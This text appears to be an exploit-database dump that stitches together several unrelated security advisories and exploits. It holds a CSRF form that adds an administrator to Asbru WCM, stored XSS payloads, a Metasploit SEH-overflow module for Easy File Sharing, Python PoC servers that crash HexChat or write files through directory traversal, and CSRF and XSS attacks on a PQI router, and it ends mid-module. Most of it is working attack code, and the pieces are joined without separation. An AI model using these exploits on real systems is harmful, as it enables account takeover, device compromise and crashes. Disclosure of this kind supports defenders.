[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
'Description' => %q{
This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
},
'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '39008' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
],
'DefaultOptions' => {
'RPORT' => 80
},
'DisclosureDate' => 'Dec 2 2015',
'DefaultTarget' => 0))
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def exploit
connect
print_status("Sending exploit...")
sploit = "GET "
sploit << rand_text_alpha_upper(4061)
sploit << generate_seh_record(target.ret)
sploit << make_nops(19)
sploit << payload.encoded
sploit << make_nops(7)
sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
sploit << " HTTP/1.0\r\n\r\n"
sock.put(sploit)
print_good("Exploit Sent")
handler
disconnect
end
end
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - Server name log directory traversal
# Date: 2016-01-26
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits)
# CVE : CVE-2016-2087
#############################
# Vulnerability description #
#############################
'''
Server Name Directory Traversal in src/common/text.c :
static char * log_create_pathname (char *servname, char *channame, char *netname)
In this function, channame (channel name) and netname (network name as
configured in the client software) are sanitized to prevent directory
traversal issues when creating a logfile BUT servname (server-provided
information) is NOT sanitized before possibly being injected into
the file path via the 'log_insert_vars' function call.
This bug could be triggered in the special (non-default) configuration
where a user would have :
* Enabled logging (Settings > Preferences > Chatting > Logging)
* Used a pattern containing '%s' in the log filepath (instead
of the default = '%n\%c.log').
When connecting to a malicious server, Hexchat IRC client may create or modify
arbitrary files on the filesystem with the permissions of the IRC client user
(non-root). For example, the following directories are accessible easily :
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
when starting Hexchat IRC client
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically
loaded when entering a channel/server (this may trigger further bugs)
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
SOUND messages (this could also trigger further bugs)
* etc.
CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVSS Base Score : 4
Impact Subscore : 4.9
Exploitability Subscore : 4.9
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
filepath pattern : '%s\%c.log' (without the quotes)
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
of something like <Hexchat-Conf>/logs/___PIZZA
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = '../PIZZA'
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1]
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Network error : ' + str(msg[0]) + ' ' + msg[1]
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-03
www.orwelllabs.com
Twitter:@orwelllabs
magicword: d0ubl3th1nk1ng...
Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Adivisory URL:
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html
Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL
background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provide a excellent wireless expreience for
everyone.
I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits a page bellow, this will set the administrative credential
for PQI Air Pen express to "root:r00t"
<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The attacker can also abuse of the multiple XSS in this device to exploit
this vulnerability, something like this to set the same cred 'root:r00t'
http://
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--
The following poc will set the credential to access point to "3groot:3g00t"
(and of course, any other value could be set in this way.)
<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticNetmask" value="255.255.255.0"
/>
<input type="hidden" name="staticGateway"
value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x"
/>
<input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x"
/>
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe_user" />
<input type="hidden" name="pppoePass" value="pppoe_passwd" />
<input type="hidden" name="pppoePass2" value="pppoe_passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp_server" />
<input type="hidden" name="l2tpUser" value="l2tp_user" />
<input type="hidden" name="l2tpPass" value="l2tp_passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192.168.1.1" />
<input type="hidden" name="l2tpNetmask" value="255.255.255.0"
/>
<input type="hidden" name="l2tpGateway" value="192.168.1.254"
/>
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp_server" />
<input type="hidden" name="pptpUser" value="pptp_user" />
<input type="hidden" name="pptpPass" value="pptp_passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192.168.1.1" />
<input type="hidden" name="pptpNetmask" value="255.255.255.0"
/>
<input type="hidden" name="pptpGateway" value="192.168.1.254"
/>
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" /> < -- 3G
User
<input type="hidden" name="Password3G" value="3gr00t" /> <-- 3G
Password
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[
* STOREDXSS
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
"Webs URL Filter Settings"
# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*
]&addwebsurlfilter=Add
Request in this page will show a pop-up with a content of javascript
payload:
http://{airpenXweb}/firewall/content_filtering.asp
# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*
]&addwebscontentfilter=Add
III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting,
since it is not carried out any validation of the data provided by the
user.
Bellow are some examples:
"Basic Wireless Settings"
# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*
XSS *
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1
# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *
]&security_mode=Disable&wzsecureAlgorithm=AES
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]
IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including all credentials available via direct request to
/cgi-bin/ExportSettings.sh.
PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh
V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
In the device description (on the Vendor's site) it is very clear that the
priority is to
facilitate everything for you, including setting. Therefore it is not
mandatory that a password
is configured for the web interface and not to connect to the AP, this way
you can find hundreds
of these completely unprotected APs.
VI. No SSL
``````````````````
Any action, whether sensitive or not is transmitted in plain text because
HTTPS is not used and no step.
POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
admuser=ORWL_user&admpass=ORWL_pass
Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered
and forms site contacts as well.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
